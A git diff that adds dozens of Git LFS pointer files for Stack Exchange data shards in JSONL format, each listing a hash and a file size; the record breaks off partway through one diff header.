0000000000000000000000000000000000000000..705a11ec0047788ac624b5087d51aea81662658a --- /dev/null +++ b/data/stackexchange/1-1/1321_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a50337a7fb4ad7f7c92bc226661bae0a4616b7858ee6a67ceec78e46217331fe +size 39586601 diff --git a/data/stackexchange/1-1/1322_2289.jsonl b/data/stackexchange/1-1/1322_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a36175c49704d88a126bfe1adc9116891fccc566 --- /dev/null +++ b/data/stackexchange/1-1/1322_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a16cdc989cd0c172d428df0e47428c6bf7f1ff337f0e47e6fc432d19eec02e55 +size 39318645 diff --git a/data/stackexchange/1-1/1323_2289.jsonl b/data/stackexchange/1-1/1323_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9d3776c94284adc758c05a6a82a858c3e89db8fd --- /dev/null +++ b/data/stackexchange/1-1/1323_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:820eaa199709d3922b9b18520ae44c4de436b746bb5dee2fa64a2a79b18cce84 +size 39871205 diff --git a/data/stackexchange/1-1/1324_2289.jsonl b/data/stackexchange/1-1/1324_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b882ce030f48aa59a3da58200bab919a99fb966e --- /dev/null +++ b/data/stackexchange/1-1/1324_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7cf59a4d12119f1595d784a303484b5078a4ba5e8691ce9bc569bb64d41098db +size 38963494 diff --git a/data/stackexchange/1-1/1325_2289.jsonl b/data/stackexchange/1-1/1325_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..13f754d720332cf7b1c16a1df9303a684edfd46b --- /dev/null +++ b/data/stackexchange/1-1/1325_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fc48cad09b2bdf30895cd86735f606193107580e93cac01a409dc94cefc71ce +size 38583055 diff --git a/data/stackexchange/1-1/1326_2289.jsonl b/data/stackexchange/1-1/1326_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ecfc6c4fa9edb0eee20122c2243548d789d7b2e --- /dev/null +++ b/data/stackexchange/1-1/1326_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a04d2ee5c9a47fc307d0f67ccb8f2fa179aec01eb8b86bc731e90580ea25116 +size 39371023 diff --git a/data/stackexchange/1-1/1327_2289.jsonl b/data/stackexchange/1-1/1327_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d7f45541af2dcdcbac4e657ee002d94ab0acc2ce --- /dev/null +++ b/data/stackexchange/1-1/1327_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5f143b4b067358768a199e179f950295566975cd45b8f70261cbaf11c0c487c +size 39582338 diff --git a/data/stackexchange/1-1/1328_2289.jsonl b/data/stackexchange/1-1/1328_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d1cacf04b2dfbf3cf8f95c9aedb5ecea51efeb20 --- /dev/null +++ b/data/stackexchange/1-1/1328_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:527649dfaebd9f14321ea66a62bc03805c068f2c8dfc77cce2d68f9427fdb7e6 +size 40186549 diff --git a/data/stackexchange/1-1/1329_2289.jsonl b/data/stackexchange/1-1/1329_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b91006c8c4a413d2fbed407bcff36930596cfc95 --- /dev/null +++ b/data/stackexchange/1-1/1329_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f58bc8e0804e4f3c26378a5a2bae1915352855b6c2f05a8e485340f05145441 +size 39612170 diff --git a/data/stackexchange/1-1/132_2289.jsonl b/data/stackexchange/1-1/132_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..131dd01bd5fcfb247e539eb89c1ae1aec63aec5f --- /dev/null +++ b/data/stackexchange/1-1/132_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5f9f71470a90a790b218138dc072c393c987ad0d45bf7fb170bf00251169613 +size 33310119 diff --git a/data/stackexchange/1-1/1330_2289.jsonl b/data/stackexchange/1-1/1330_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a82f516257447a349cfbeb7841a507266042ecea --- /dev/null +++ b/data/stackexchange/1-1/1330_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d9d8f041be2626899468bfa5b3472dd2e4e131f98d311f73161133fe6bcace9 +size 39260336 diff --git a/data/stackexchange/1-1/1331_2289.jsonl b/data/stackexchange/1-1/1331_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8870726b1e20d3f1fcd740e6d4928c02e6266ec --- /dev/null +++ b/data/stackexchange/1-1/1331_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:451edef60121332426805420246c61fa6b504abb2ec9fb9975bfdb5321958761 +size 39512776 diff --git a/data/stackexchange/1-1/1332_2289.jsonl b/data/stackexchange/1-1/1332_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0de474e171e1337cb948b0d5b87b47a72581978e --- /dev/null +++ b/data/stackexchange/1-1/1332_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cc17540c3f32ddad319083386aa7b88043c4a4ef4da310f95ddfb99a251fc017 +size 39684655 diff --git a/data/stackexchange/1-1/1333_2289.jsonl b/data/stackexchange/1-1/1333_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6d1600c8e899b14f8fb67ff24d1a958b0b89839d --- /dev/null +++ b/data/stackexchange/1-1/1333_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eabeb5d335c19ca81849f859d63d4f0668238eaf8b05a8521ea0cc241152e814 +size 39666738 diff --git a/data/stackexchange/1-1/1334_2289.jsonl b/data/stackexchange/1-1/1334_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fec4e6a4a95d150e498d07fa6417ad05d6a77162 --- /dev/null +++ b/data/stackexchange/1-1/1334_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97b6fbdae13d245a08427fd0f369a56276944787196c612c0a68be7c5bc6909e +size 39873905 diff --git a/data/stackexchange/1-1/1335_2289.jsonl b/data/stackexchange/1-1/1335_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..198e9fa0905bb8dd0957c86e60812d673ea0ced0 --- /dev/null +++ b/data/stackexchange/1-1/1335_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02f1ed20b75a1a9f1f1b3073ad10ae9ac40a420129549b4c1e5a0bae54a501de +size 39773054 diff --git a/data/stackexchange/1-1/1336_2289.jsonl b/data/stackexchange/1-1/1336_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0e08ed48613c0c8864c33d108959a565a90f6014 --- /dev/null +++ b/data/stackexchange/1-1/1336_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6db4fbf60c2290cd3d81ea2fe084c515762ea114daa3652bf9c4a1b9c6648d68 +size 40001033 diff --git a/data/stackexchange/1-1/1337_2289.jsonl b/data/stackexchange/1-1/1337_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..85ad7b0a56f2f21ba2ff95dcc70386fe9a76cc7f --- /dev/null +++ b/data/stackexchange/1-1/1337_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd088141ed26060ae90e4ade92a67e319eee784804618b12a7f38a1e8678414e +size 39791447 diff --git a/data/stackexchange/1-1/1338_2289.jsonl b/data/stackexchange/1-1/1338_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f2f9827a3ab40d068adee9aa9a9aafac9615815 --- /dev/null +++ b/data/stackexchange/1-1/1338_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45a3c4da53b728506dfedf1b5272d20fcb11c1700ff2a60b312cc9f8fc034727 +size 39233259 diff --git a/data/stackexchange/1-1/1339_2289.jsonl b/data/stackexchange/1-1/1339_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a8abf7adb14d0be2f679f139fcc791790818ca7c --- /dev/null +++ b/data/stackexchange/1-1/1339_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e7a78ca099369b7dd51e04847cea0ae0de259319b7014690bbd5883750f6345 +size 37002706 diff --git a/data/stackexchange/1-1/133_2289.jsonl b/data/stackexchange/1-1/133_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c08ee3d079e2210dd87615818a65d567efb15148 --- /dev/null +++ b/data/stackexchange/1-1/133_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0bd3994499daebbfeef3a03eaf058cb3fdfa9aba38bd459cb4a42592de377d9c +size 33915672 diff --git a/data/stackexchange/1-1/1340_2289.jsonl b/data/stackexchange/1-1/1340_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02035cb77b6cc7b2b241a9457d11a548151ddc9b --- /dev/null +++ b/data/stackexchange/1-1/1340_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79b994d447c57ffb83c5c9f033e9a06751bf9ff8d823797606bc484d877296f7 +size 38063659 diff --git a/data/stackexchange/1-1/1341_2289.jsonl b/data/stackexchange/1-1/1341_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b0f4cb7f9b6399cd285e0fcabf9ff42611365f9 --- /dev/null +++ b/data/stackexchange/1-1/1341_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4815d4f407615932c4a1617d6b5d2d88e035899eb998ba4f02d9f257595f5af +size 37212732 diff --git a/data/stackexchange/1-1/1342_2289.jsonl b/data/stackexchange/1-1/1342_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df1c20cc97e21fcb8cea19081d642e2da745bbe7 --- /dev/null +++ b/data/stackexchange/1-1/1342_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:09bd02bda0398f199f667f75095eaba227731fb5b6da9647d5104a8601908cbd +size 37227529 diff --git a/data/stackexchange/1-1/1343_2289.jsonl b/data/stackexchange/1-1/1343_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eab92e409f141da86988ceb3f65f7b84fc13a622 --- /dev/null +++ b/data/stackexchange/1-1/1343_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fabbb74a48273da7fcbdee5fffa30f592c77b8f40de38759da79725e0230ad5 +size 36990420 diff --git a/data/stackexchange/1-1/1344_2289.jsonl b/data/stackexchange/1-1/1344_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cffadd41e57f395bac24b0419cd951d3cc5ac5ed --- /dev/null +++ b/data/stackexchange/1-1/1344_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:16888d76c374d863505c3b4f681bd4340b98dfe821958ce90cbc7dd5ef2b8af9 +size 37113766 diff --git a/data/stackexchange/1-1/1345_2289.jsonl b/data/stackexchange/1-1/1345_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7bcd862a51da11ec9689353633b351092b90686d --- /dev/null +++ b/data/stackexchange/1-1/1345_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:64b6f3cfc7d8df0ae2c81340f837e1ecdf9e7255141b4e7186a71b874b79e257 +size 37482888 diff --git a/data/stackexchange/1-1/1346_2289.jsonl b/data/stackexchange/1-1/1346_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..73c1ee6666e0c281108b0b654259bda67715b993 --- /dev/null +++ b/data/stackexchange/1-1/1346_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be5d931ae91f902ef5fe48f24cc3e79179fc1c767a6447f8105c2d82c55f67f8 +size 37626430 diff --git a/data/stackexchange/1-1/1347_2289.jsonl b/data/stackexchange/1-1/1347_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..82b20bdb35bf9793b7df479330b2c57e1b6aea66 --- /dev/null +++ b/data/stackexchange/1-1/1347_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d26ca5dd97f01a0b182c6d83fcea29ad836bb6e7998d6c157758152ce121712 +size 37322176 diff --git a/data/stackexchange/1-1/1348_2289.jsonl b/data/stackexchange/1-1/1348_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ea3044138ec40f0c456edae0b4dd0529dbdcdbaf --- /dev/null +++ b/data/stackexchange/1-1/1348_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b61b7b3e4336b6ef6f20e129b610af0699338bdb9bc654f2958b0ab441e7947 +size 37568764 diff --git a/data/stackexchange/1-1/1349_2289.jsonl b/data/stackexchange/1-1/1349_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5fe28abced09d50dd0b125f8cb4a8de6a16da4a8 --- /dev/null +++ b/data/stackexchange/1-1/1349_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91f42560705bfed61b62359b0299ee153d192a62e623328e185322207c5447ba +size 37441446 diff --git a/data/stackexchange/1-1/134_2289.jsonl b/data/stackexchange/1-1/134_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a806802e1085603e70c2e653222a8b5adcc2b310 --- /dev/null +++ b/data/stackexchange/1-1/134_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:763a985e53362ad2a7076bc5473fdb7c4706cc8cc48357755518e4b0b2cc425a +size 33616133 diff --git a/data/stackexchange/1-1/1350_2289.jsonl b/data/stackexchange/1-1/1350_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c7bdde4a276c036e2759bfac3ae9a4d9c9b8222 --- /dev/null +++ b/data/stackexchange/1-1/1350_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:847ae2463df97613743fee52c2d35d284de856792ed2004563133f07e29e576e +size 37391595 diff --git a/data/stackexchange/1-1/1351_2289.jsonl b/data/stackexchange/1-1/1351_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..be6dfa6f8e2f44c265b71c0d57242a4daaaedf48 --- /dev/null +++ b/data/stackexchange/1-1/1351_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e583d815e54d8fc6db40fab7ca0d7dae6dce5fd080e1b8641e3b169c619e99e9 +size 37269652 diff --git a/data/stackexchange/1-1/1352_2289.jsonl b/data/stackexchange/1-1/1352_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a5c5e92defa47eca9d109653537d3e7df81f95c6 --- /dev/null +++ b/data/stackexchange/1-1/1352_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fbec7cd178552d5f099796b75ae41cf8c429afcd2690956fe0f142aa91e4119 +size 37310404 diff --git a/data/stackexchange/1-1/1353_2289.jsonl b/data/stackexchange/1-1/1353_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7158f109025a4db18218a16e150e13f9c39081d --- /dev/null +++ b/data/stackexchange/1-1/1353_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80f56e003d25c2a8464945a4c8ed0486c9dadbc0f0c181ffacc828722a53db19 +size 37047162 diff --git a/data/stackexchange/1-1/1354_2289.jsonl b/data/stackexchange/1-1/1354_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c3a582c6b2820d4280a981dd64f041db36c33555 --- /dev/null +++ b/data/stackexchange/1-1/1354_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af51ee0460e85c9e484e06094507685974213efb64cf8d18a03b15ceb5d421e3 +size 37312889 diff --git a/data/stackexchange/1-1/1355_2289.jsonl b/data/stackexchange/1-1/1355_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1312b979634f51f12f36546f4e8cf5b3f78a3365 --- /dev/null +++ b/data/stackexchange/1-1/1355_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8e3ae666447955928dfe91fdd0f3a1a5846050d2ebe8203877e598f6502cd716 +size 36886868 diff --git a/data/stackexchange/1-1/1356_2289.jsonl b/data/stackexchange/1-1/1356_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed5d04252ba9a2eeb3fe5400b2cafadbbf25939c --- /dev/null +++ b/data/stackexchange/1-1/1356_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c313dca9b7c5571193498c2c4814a38817c9e9d2eead14f8eefb59d3e544d9a +size 37436362 diff --git a/data/stackexchange/1-1/1357_2289.jsonl b/data/stackexchange/1-1/1357_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bd0e4a179531ee9d420fe11822c13734af4c51ce --- /dev/null +++ b/data/stackexchange/1-1/1357_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62c1c83672008d64c0852c388031ab63265856c9367e556f3d1c237066b96330 +size 36693309 diff --git a/data/stackexchange/1-1/1358_2289.jsonl b/data/stackexchange/1-1/1358_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ac23c4a8b627e5bc180da0f23858c89423cce69 --- /dev/null +++ b/data/stackexchange/1-1/1358_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:315530c7efca67475c0494f566d9f604037e5d14375dbbebf300f79d5979b8eb +size 37237601 diff --git a/data/stackexchange/1-1/1359_2289.jsonl b/data/stackexchange/1-1/1359_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e7ed33786c3fe1aed54423ca12f22cfb72aa05b6 --- /dev/null +++ b/data/stackexchange/1-1/1359_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d31638141ac2dcf24a924771a30de14e0e7478fae63558e09c86ad98261d581c +size 37270823 diff --git a/data/stackexchange/1-1/135_2289.jsonl b/data/stackexchange/1-1/135_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c69b921ce71ec888a2591e96c656d2c1495a8ff5 --- /dev/null +++ b/data/stackexchange/1-1/135_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:adaf6e71d7cb6a677bb21e30a8954550d9f727ef41a80dca64d37b858c6251ec +size 33351609 diff --git a/data/stackexchange/1-1/1360_2289.jsonl b/data/stackexchange/1-1/1360_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b2d3a8d095a210ce177620239c698f012dfa492a --- /dev/null +++ b/data/stackexchange/1-1/1360_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48a67e163331ef1010ac8da3e258c189c6ce37b3af43bd3b10b22297549fa716 +size 37477816 diff --git a/data/stackexchange/1-1/1361_2289.jsonl b/data/stackexchange/1-1/1361_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f0e2443afc9f4703ef502101debe16b60993e229 --- /dev/null +++ b/data/stackexchange/1-1/1361_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89211d23504f992852311a9fb477e3f26101facbe0c52e9991a8941aa4db1893 +size 37696653 diff --git a/data/stackexchange/1-1/1362_2289.jsonl b/data/stackexchange/1-1/1362_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b1647465076b0e0d2c44e86a04a85ace758eee74 --- /dev/null +++ b/data/stackexchange/1-1/1362_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb61ded2c1cf8d95e879b7b7b3b3583cf74e70a991db96a2b075e799b55019df +size 37332427 diff --git a/data/stackexchange/1-1/1363_2289.jsonl b/data/stackexchange/1-1/1363_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f6769295ae5b841bacadee7e135562dac4d52d7e --- /dev/null +++ b/data/stackexchange/1-1/1363_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fab13b88adcba65f6b4f2fef7647fabf9890cb9438ca8268a3874c2f07e9b9f9 +size 37739520 diff --git a/data/stackexchange/1-1/1364_2289.jsonl b/data/stackexchange/1-1/1364_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b63da45dd0e6c3f8d93177b424cb8a11cf9cbd28 --- /dev/null +++ b/data/stackexchange/1-1/1364_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd4eda785e9d476ad0330b46911d4c94fafa45c62af4a0f87868609882c2573d +size 36836880 diff --git a/data/stackexchange/1-1/1365_2289.jsonl b/data/stackexchange/1-1/1365_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fd07f80aae9972cd0d381b656aaeb3b98d903e73 --- /dev/null +++ b/data/stackexchange/1-1/1365_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:768043af91b2f5b41c3d7d16c4d2eab4ed8371060d13cf5df83143ca576ccecf +size 37201808 diff --git a/data/stackexchange/1-1/1366_2289.jsonl b/data/stackexchange/1-1/1366_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..70638ac583fad97724fe5e58e3c2b7ae2bef1c45 --- /dev/null +++ b/data/stackexchange/1-1/1366_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9d916293e32d2e0267ba66a584a8a69f0e0925d701584173af7a87338e86998e +size 37005296 diff --git a/data/stackexchange/1-1/1367_2289.jsonl b/data/stackexchange/1-1/1367_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..61ac0ead4862d8af48a561c1b5aaa8de34898127 --- /dev/null +++ b/data/stackexchange/1-1/1367_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b05453d491f797b1ff19fca1699eba59a4e0f655b000b0378e33998b94975d7b +size 37182355 diff --git a/data/stackexchange/1-1/1368_2289.jsonl b/data/stackexchange/1-1/1368_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c2070dd680e909568605c7bfa9c957162c55fb3 --- /dev/null +++ b/data/stackexchange/1-1/1368_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:670d55d4b7d998216bb92977e562f578593cd23ae8775d1495a5d0ffedc9e7ec +size 37443029 diff --git a/data/stackexchange/1-1/1369_2289.jsonl b/data/stackexchange/1-1/1369_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63ed015dcc63533f42958b9fa5dee319258cfa08 --- /dev/null +++ b/data/stackexchange/1-1/1369_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44b0099caf0600e358434dee104151c77b0215282bfd4deddd9c1ce4d2fb6653 +size 36949905 diff --git a/data/stackexchange/1-1/136_2289.jsonl b/data/stackexchange/1-1/136_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c1afdddeb7fc05f35afa5ae776f4a2e0d643bc3 --- /dev/null +++ b/data/stackexchange/1-1/136_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25196a19be0e6d51a9d0045a36f5b297bfbcf4e365259e891d5fd35ce8f8ac39 +size 33490404 diff --git a/data/stackexchange/1-1/1370_2289.jsonl b/data/stackexchange/1-1/1370_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..085886545140c368427ea0214e39c16f5c165415 --- /dev/null +++ b/data/stackexchange/1-1/1370_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f300c5e54b3a350bd3c30f54efe15705c5df7ebec1f2f0c2201fc01007fef531 +size 37495852 diff --git a/data/stackexchange/1-1/1371_2289.jsonl b/data/stackexchange/1-1/1371_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..31eb116a76ef572af1a089bf63462adb923f9d70 --- /dev/null +++ b/data/stackexchange/1-1/1371_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44a2fc65c2d0be5fd8ff4ed8d6b7c5b3a34b507b597fcf9f05a879975a47c1ba +size 37235270 diff --git a/data/stackexchange/1-1/1372_2289.jsonl b/data/stackexchange/1-1/1372_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a4ff42163d3dab3c45a6132e9836d3b07ebf30f4 --- /dev/null +++ b/data/stackexchange/1-1/1372_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c194fe9b8e3673117770d27e0513a10c0614dff0a4f763aa65c1f89b30495ae +size 37401862 diff --git a/data/stackexchange/1-1/1373_2289.jsonl b/data/stackexchange/1-1/1373_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a398bd3b3e6dbecf72495ce80562b8bcd8efe7d --- /dev/null +++ b/data/stackexchange/1-1/1373_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f8e01272813cf7f8b210f17499fad92cba5f29d9598717dfecfbef2cb9f6f9c +size 37065476 diff --git a/data/stackexchange/1-1/1374_2289.jsonl b/data/stackexchange/1-1/1374_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..73e4e7e32f8e1c4f75b9a4e1f695a816ac189fb0 --- /dev/null +++ b/data/stackexchange/1-1/1374_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcbff032f2f43879c50c1953a6316b4da2662f272078dcc62c94deea34514c4a +size 37929273 diff --git a/data/stackexchange/1-1/1375_2289.jsonl b/data/stackexchange/1-1/1375_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..17a32dc037be85494ad346bb2c522fa8962821b8 --- /dev/null +++ b/data/stackexchange/1-1/1375_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:069cda5be55d6b249acc15d14e9d05a899565f1c8a74b80680fc7cd63db383cc +size 37350058 diff --git a/data/stackexchange/1-1/1376_2289.jsonl b/data/stackexchange/1-1/1376_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..569620046cb371e8093dfc4f8d309d9ee0ac930f --- /dev/null +++ b/data/stackexchange/1-1/1376_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75d9e94a9cf1ec1999a8e004d466755775e3e9ce3d8fbba7dc14a1ccd5a4a958 +size 37193391 diff --git a/data/stackexchange/1-1/1377_2289.jsonl b/data/stackexchange/1-1/1377_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6ef87e2033450842a535cd4b1b162482f139fbf5 --- /dev/null +++ b/data/stackexchange/1-1/1377_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:965cdfbbf4ac73b149524e98b0da27f89db933d8ccb73f7f34c20e58f573a780 +size 37099456 diff --git a/data/stackexchange/1-1/1378_2289.jsonl b/data/stackexchange/1-1/1378_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae875de221550eb443ab3bfdd8a50652c8487c9f --- /dev/null +++ b/data/stackexchange/1-1/1378_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:47498ae07582a5f4044d42b9e4a05f7d8e0aac17b2db24816eb1edbdfacf120c +size 37014303 diff --git a/data/stackexchange/1-1/1379_2289.jsonl b/data/stackexchange/1-1/1379_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..819d326993548f8bd6c562ca1277201d0af6ff6b --- /dev/null +++ b/data/stackexchange/1-1/1379_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f4588ce974a34911d0e12112ae01371fb281fcdd48cb5d12f84a9016216566c +size 37577797 diff --git a/data/stackexchange/1-1/137_2289.jsonl b/data/stackexchange/1-1/137_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ecf0e770c574fc16256275b4e30375188fae093 --- /dev/null +++ b/data/stackexchange/1-1/137_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90380ef0301a54eefc68547df69ec6327b99171bdf3fc842f6adb0887c16fa38 +size 33769612 diff --git a/data/stackexchange/1-1/1380_2289.jsonl b/data/stackexchange/1-1/1380_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d620fb911ab2a5bc1dca16f31f7001c03974c790 --- /dev/null +++ b/data/stackexchange/1-1/1380_2289.jsonl @@ -0,0 